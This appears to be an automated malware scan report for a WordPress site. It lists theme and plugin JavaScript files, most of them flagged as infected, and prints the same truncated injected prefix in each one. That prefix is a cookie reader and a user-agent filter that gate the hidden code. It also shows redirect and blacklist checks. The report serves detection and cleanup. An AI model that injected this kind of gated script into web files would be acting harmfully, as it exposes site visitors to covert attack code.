Scanned pages/files
Request | Server response | Status |
http://belindomag.nl/ | 200 OK Content-Length: 95383 Content-Type: text/html | clean |
http://belindomag.nl/wp-content/plugins/jquery-updater/js/jquery-2.1.1.min.js?abd973 | 200 OK Content-Length: 85215 Content-Type: application/x-javascript | malicious |
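Malicious code - confirmed by antiviruses (see below):
function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo [… snippet cut off here in the report …]
Note: the visible part defines a cookie reader (getCookie) and a helper d() that tests navigator.userAgent for the substrings "Yandex", "AppleWebKit", "Windows NT 6.3", "X11", "Phone" and "Google". The snippet breaks off before it shows how the cookie value and the user-agent result are used. The same prefix opens every file flagged in this report, which suggests one injection written into many .js files rather than separate infections. Cleanup should therefore compare each script against a known-good copy of the plugin, theme or WordPress core file.
Antivirus reports: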
| ||
http://belindomag.nl/wp-includes/js/jquery/jquery-migrate.min.js?abd973 | 200 OK Content-Length: 8170 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo [… snippet cut off here in the report …]
Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/jquery.fitvids.js?abd973 | 200 OK Content-Length: 3776 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo [… snippet cut off here; the text below appears to be the end of the same file …]
$this.attr('id', videoID); } $this.wrap('<div class="fluid-width-video-wrapper"></div>').parent('.fluid-width-video-wrapper').css('padding-top', (aspectRatio * 100)+"%"); $this.removeAttr('height').removeAttr('width'); }); }); } })( jQuery ); jQuery(document).ready(function(){ jQuery(".gdl-page-row-wrapper, .footer-wrapper").fitVids(); });
Antivirus reports:
| ||
http://belindomag.nl/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js?abd973 | 200 OK Content-Length: 1964 Content-Type: application/x-javascript | clean |
http://belindomag.nl/wp-content/plugins/wp-polls/polls-js.js?abd973 | 200 OK Content-Length: 3900 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo [… snippet cut off here; the text below appears to be the end of the same file …]
function poll_process_success(b){jQuery(document).ready(function(a){a("#polls-"+poll_id).replaceWith(b);pollsL10n.show_loading&&a("#polls-"+poll_id+"-loading").hide();pollsL10n.show_fading&&a("#polls-"+poll_id).fadeTo("def",1);set_is_being_voted(!1)})}function set_is_being_voted(b){is_being_voted=b};
Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/superfish.js?abd973 | 200 OK Content-Length: 6929 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo [… snippet cut off here; the text below appears to be the end of the same file …]
$this = this.addClass(o.hoverClass), $ul = $this.children('ul'); o.onBeforeShow.call($ul); $ul.stop(true, true).animate(o.animation, o.speed, function() { o.onShow.call($ul); $this.children('a').data('follow', true); }); return this; } }); if (sf.ios) { $(window).load(function() { $('body').children().on('click', $.noop); }); } })(jQuery);
Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/supersub.js?abd973 | 200 OK Content-Length: 4356 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo [… snippet cut off here; the text below appears to be the end of the same file …]
'float' : liFloat, 'width' : '100%', 'white-space' : 'normal' }) .each(function(){ var $childUl = $('>ul',this); var offsetDirection = $childUl.css('left')!==undefined ? 'left' : 'right'; $childUl.css(offsetDirection,emWidth); }); }); }); }; $.fn.supersubs.defaults = { minWidth : 9, maxWidth : 25, extraWidth : 0 }; })(jQuery);
Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/hoverIntent.js?abd973 | 200 OK Content-Length: 6026 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo [… snippet cut off here; the text below appears to be the end of the same file …]
} else { $(ob).off("mousemove.hoverIntent",track); if (ob.hoverIntent_s == 1) { ob.hoverIntent_t = setTimeout( function(){delay(ev,ob);} , cfg.timeout );} } }; return this.on({'mouseenter.hoverIntent':handleHover,'mouseleave.hoverIntent':handleHover}, cfg.selector); }; })(jQuery);
Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/jquery.easing.js?abd973 | 200 OK Content-Length: 9271 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo [… snippet cut off here; the text below appears to be the end of the same file …]
return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } });
Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/jquery.fancybox.js?abd973 | 200 OK Content-Length: 20468 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo [… snippet cut off here; the text below appears to be the end of the same file …]
nextMethod : 'resizeIn', nextSpeed : 250, prevMethod : 'resizeOut', prevSpeed : 250, helpers : { media : {}, thumbs : { width: parseInt(ATTR.width), height: parseInt(ATTR.height) } } }); }else{ jQuery('[data-rel="fancybox"]').fancybox({ nextMethod : 'resizeIn', nextSpeed : 250, prevMethod : 'resizeOut', prevSpeed : 250, helpers : { media : {} } }); } });
Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/jquery.fancybox-media.js?abd973 | 200 OK Content-Length: 4019 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo [… snippet cut off here; the text below appears to be the end of the same file …]
href = '//' + rez[1] + '/p/' + rez[2] + '/media/?size=l'; type = 'image'; } else if ((rez = href.match(/maps\.google\.com\/(\?ll=|maps\/?\?q=)(.*)/i))) { href = '//maps.google.com/' + rez[1] + '' + rez[2] + '&output=' + (rez[2].indexOf('layer=c') ? 'svembed' : 'embed'); type = 'iframe'; } if (type) { obj.href = href; obj.type = type; } } } }(jQuery));
Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/jquery.fancybox-thumbs.js?abd973 | 200 OK Content-Length: 4696 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo [… snippet cut off here; the text below appears to be the end of the same file …]
afterShow: function (opts) { if (this.list) { this.update(opts); } else { this.init(opts); } this.list.children().removeClass('active').eq(F.current.index).addClass('active'); }, onUpdate: function () { this.update(); }, beforeClose: function () { if (this.wrap) { this.wrap.remove(); } this.wrap = null; this.list = null; this.width = 0; } } }(jQuery));
Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/gdl-scripts.js?abd973 | 200 OK Content-Length: 9988 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo [… snippet cut off here; the text below appears to be the end of the same file …]
if( max_height < jQuery(this).height()){ max_height = jQuery(this).height(); } }); jQuery(this).children('.portfolio-item').height(max_height); }); } setTimeout(function(){ set_portfolio_height(); }, 100); jQuery(window).resize(function(){ set_personnal_height(); set_price_table_height(); set_portfolio_height() }); });
Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/marquee.js?abd973 | 200 OK Content-Length: 3402 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo [… snippet cut off here; the text below appears to be the end of the same file …]
var time = time_multiplier * jQuery(this).outerWidth(); jQuery(this).animate({ 'margin-left': -item_width }, time, 'linear', function(){ var clone_item = jQuery(this).clone(); clone_item.css({ 'margin-left': '0' }); marquee.append(clone_item); jQuery(this).remove(); reset.call(marquee.children().filter(':first')); }); }; reset.call(marquee.children().filter(':first')); });
Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: belindomag.nl
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=1816, public, public
Connection: close
Date: Sat, 08 Nov 2014 22:58:37 GMT
Pragma: public
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding,Cookie
Content-Length: 95383
Content-Type: text/html; charset=UTF-8
Expires: Sat, 08 Nov 2014 23:28:54 GMT
Last-Modified: Sat, 08 Nov 2014 22:28:54 GMT
...95383 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: belindomag.nl
Referer: http://www.google.com/search?q=belindomag.nl
Result:
The result is similar to the first query. There are no suspicious redirects found. As shown, this check compares the server's HTTP responses to two plain GET requests (with and without a search-engine Referer). Behaviour that depends on scripts running in a browser, such as the JavaScript flagged in the file list above, would not show up here.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=belindomag.nl
Result: This site is not currently listed as suspicious. (A blacklist lookup reflects only what the list operator has recorded so far; it does not contradict the per-file findings above.)
Query: http://yandex.com/infected?l10n=en&url=http://belindomag.nl/
Result: belindomag.nl is not infected or malware details are not published yet.